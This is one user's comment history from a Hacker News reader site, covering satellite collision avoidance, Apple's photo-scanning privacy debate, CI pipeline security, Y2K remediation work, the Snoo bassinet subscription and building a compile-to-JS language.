Readit News logoReadit News
rzimmerman commented on An Orbital House of Cards: Frequent Megaconstellation Close Conjunctions   arxiv.org/abs/2512.09643... · Posted by u/rapnie
brookst · 11 days ago
And wouldn’t the solar panels have less cross section than the satellite bodies, so even an apparent collision might just be a very near miss? (Honest question, not rhetorical, could be I’m wrong)
rzimmerman · 11 days ago
Yeah the solar array on Starlink is held perpendicular to the velocity vector, so the cross section relative to the colliding body will invariably be smaller than the worst case.
rzimmerman commented on An Orbital House of Cards: Frequent Megaconstellation Close Conjunctions   arxiv.org/abs/2512.09643... · Posted by u/rapnie
rzimmerman · 11 days ago
It's interesting to try to create a metric of collision avoidance "stress" and resiliency to outages. I don't think this is a particularly useful one (and the title is alarmist/flamebait), but it is a first cut at something new. A more nuanced aggregate strategy for different orbital altitudes would make sense. Maybe some can suggest (or has already suggested) a comprehensive way to keep the risk of cascading debris events low (and measured) that is useful for launch planning.

Complete loss of control of the entire Starlink constellation (or any megaconstellation) for days at a time would be an intense event. Any environmental cause (a solar event) would be catastrophic ground-side as well. Starlink satellites will decay and re-enter pretty quickly if they lose attitude control, so it's a bit of a race between collisions and drag. Starlink solar arrays are quite large drag surfaces and the orbital decay probably makes collisions less likely. I would not be surprised if satellites are designed to deorbit without ground contact for some period of time. I'm sure SpaceX has done some interesting math on this and it would be interesting to see.

Collision avoidance warnings are public (with an account): https://www.space-track.org/ But importantly they are intended to be actionable, conservative warnings a few days to a week out. They overstate the probability based on assumptions like this paper (estimates at cross-sectional area, uncertainty in orbital knowledge from ground radar, ignorance of attitude control or for future maneuvers). Operators like SpaceX will take these and use their own high-fidelity knowledge (from onboard GPS) to get a less conservative, more realistic probability assessment. These probabilities invariably decrease over time as the uncertainty gets lower. Starlink satellites are constantly under thrust to stay in a low orbit with a big draggy solar array, so a "collision avoidance manuever" to them is really just a slight change to the thrust profile.

Interesting stuff in the paper, but I'm annoyed at the title. I hate when people fear-bait about Kessler syndrome against some of the more responsible actors.

rzimmerman commented on CubeSats are fascinating learning tools for space   jeffgeerling.com/blog/202... · Posted by u/warrenm
bilsbie · 3 months ago
I’m really confused how you communicate with it? That seems like the most (expensive?) and technically difficult part.

I’ve got some cool ideas for atmospheric Reentry but I’d imagine there are all kinds of permits needed?

rzimmerman · 3 months ago
If you're interested in building something, Planet released an open source hardware/software satellite radio that works over amateur radio bands for ~$50: https://github.com/OpenLST/openlst
rzimmerman commented on Apple Photos phones home on iOS 18 and macOS 15   lapcatsoftware.com/articl... · Posted by u/latexr
mrshadowgoose · a year ago
> a legal requirement to scan photos

Can you provide documentation demonstrating this requirement in the United States? It is widely understood that no such requirement exists.

There's no need to compromise with any requirement, this was entirely voluntary on Apple's part. That's why people were upset.

> I can't believe how uninformed

Oh the irony.

rzimmerman · a year ago
Should have said "potential legal requirement". There was a persistent threat of blocking the use of E2E encryption for this exact reason.
rzimmerman commented on Apple Photos phones home on iOS 18 and macOS 15   lapcatsoftware.com/articl... · Posted by u/latexr
EagnaIonat · a year ago
That whole incident was so misinformed.

CSAM scanning takes place on the cloud with all the major players. It only has hashes for the worst of the worst stuff out there.

What Apple (and others do) is allow the file to be scanned unencrypted on the server.

What the feature Apple wanted to add was scan the files on the device and flag anything that gets a match.

That file in question would be able to be decrypted on the server and checked by a human. For everything else it was encrypted in a way it cannot be looked at.

If you had icloud disabled it could do nothing.

The intent was to protect data, children and reduce the amount of processing done on the server end to analyse everything.

Everyone lost their mind yet it was clearly laid out in the papers Apple released on it.

rzimmerman · a year ago
I can't believe how uninformed, angry, and still willing to argue about it people were over this. The whole point was a very reasonable compromise between a legal requirement to scan photos and keeping photos end-to-end encrypted for the user. You can say the scanning requirement is wrong, there's plenty of arguments for that. But Apple went so above and beyond to try to keep photo content private and provide E2E encryption while still trying to follow the spirit of the law. No other big tech company even bothers, and somehow Apple is the outrage target.
rzimmerman commented on Apple Photos phones home on iOS 18 and macOS 15   lapcatsoftware.com/articl... · Posted by u/latexr
rzimmerman · a year ago
If your core concern is privacy, surely you'd be fine with "no bytes ever leave my device". But that's a big-hammer way to ensure no one sees your private data. What about external (iCloud/general cloud) storage? That's pretty useful, and if all your data is encrypted in such a way that only you can read it, would you consider that private? If done properly, I would say that meets the goal.

What if, in addition to storage, I'd like to use some form of cloud compute on my data? If my device preprocesses/anonymizes my data, and the server involved uses homomorphic encryption so that it also can't read my data, is that not also good enough? It's frustrating to see how much above and beyond Apple has taken this simple service to actually preserve user privacy.

I get that enabling things by default triggers some old wounds. But I can understand the argument that it's okay to enable off-device use of personal data IF it's completely anonymous and privacy preserving. That actually seems very reasonable. None of the other mega-tech companies come close to this standard.

rzimmerman commented on Zizmor would have caught the Ultralytics workflow vulnerability   blog.yossarian.net/2024/1... · Posted by u/campuscodi
RainyDayTmrw · a year ago
Why has CI for open-source projects become so difficult to secure? Where did we, collectively, go wrong?

I suppose, it's probably some combination of: CI is configured in-band in the repo, PRs are potentially untrusted, CI uses the latest state of config on a potentially untrusted branch, we still want CI on untrusted branches, CI needs to run arbitrary code, CI has access to secrets and privileged operations.

Maybe it's too many degrees-of-freedom creating too much surface area. Maybe we could get by with a much more limited subset, at least by default.

I've been doing CI stuff in my last two day jobs. In contrast, we worked only on private repos with private collaborators, and we explicitly designated CI as trusted.

rzimmerman · a year ago
It's a web of danger for sure. Configuring CI in-repo is popular (especially in the Gitlab world) and it's admittedly a low-friction way to at least get people to use config control for CI (or use CI for builds at all). I think the number of degrees of freedom is really a footgun.

I remember early Gitlab runner use when I had a (seemingly) standard build for a docker image. There wasn't any obvious standard way to do that. There were recommendations for dind, just giving shell access, etc. There's so much customization that it's hard to decide what's safe for a protected/main branch vs. user branches.

I don't have a solution. But I think it would be better if, by default, CI engines were a lot less configurable and forced users to adjust their repo and build to match some standard configurations, like:

- Run `make` in a Debian docker image and extract this binary file/.deb after installing some apt packages

- Run docker build . and push the image somewhere

- Run go build in a standard golang container

And really made you dance a little more to do things like "just run this bash script in the repo". Restrict those kinds of builds to protected branches/special setups.

Having the CI config in the same source control tree is dangerous and hard to secure. It would probably be better to have some kind of headless branch like Github pages that is just for CI config.

rzimmerman commented on My fake job in Y2K preparedness   nplusonemag.com/issue-48/... · Posted by u/bookofjoe
rzimmerman · a year ago
I worked for about a year with a consulting firm that handled "Y2K compliance". Unlike this Andersen exercise in legal face-saving, it was a real job. Big companies hired us to do a full inventory of their site equipment (this included manufacturing plants, Pharma stuff) and go line by line with their vendors and figure out which components had known Y2K issues, which had not been tested at all, and which ones were fine/had simple fixes. We helped them replace and fix what needed to be fixed.

Y2K was a real problem. The end-of-the-world blackouts + planes falling from the sky was sensationalism, but there were real issues and most of them got fixed. Not trying to take away from this very interesting story of corrupt cronyism, but there were serious people dealing with serious problems out there. "Remember Y2K? Nothing happened!" is a super toxic lesson to take away from a rare success where people came together and fixed something instead of firefighting disasters.

rzimmerman commented on Parents outraged at Snoo after smart bassinet company charges fee to rock crib   independent.co.uk/news/wo... · Posted by u/pseudolus
rzimmerman · a year ago
The Snoo is great and the key feature that actually helps prevent SIDS is the restraints and swaddle, which is not being moved to a subscription here. It's actually FDA approved to reduce the risk of SIDS. The "bonus" rocking and soothing noises just help parents get more sleep.

The Snoo is very expensive and easy to pass down or buy used. I think they probably screwed up by selling it outright. You can rent the Snoo, which is probably a better model for everyone. This is kind of a janky way to pull back some of the rental revenue they lost by selling a durable product that people only need for a few months.

It feels gross, I get it. But it's effectively a $100 per child fee which is quite reasonable given the benefits. And there's no realistic way to charge for that other than subscription for the premium (non-safety) stuff. The alternative is to keep developing new models with new features and adding crap people don't need. One thing I love about the original Snoo is that it works fine without an Internet connection or app. I used the app and it was great, but it's nice to know that when you travel or lose power, it can still rock your baby and soothe them. I hope that's still the case if there's a subscription involved.

rzimmerman commented on What you learn by making a new programming language   ntietz.com/blog/you-shoul... · Posted by u/kaycebasques
rzimmerman · a year ago
I spent time on a compile-to-JS language and found it very rewarding: https://github.com/rzimmerman/kal

This was before async/generators were added to JS and callback hell was quite real. I wanted to shape it in the way I’d learned to program in Visual Basic. Very human readable. The result is no longer useful, but it was a fun goal to have the compiler compile itself.

u/rzimmerman

KarmaCake day2076October 28, 2012View Original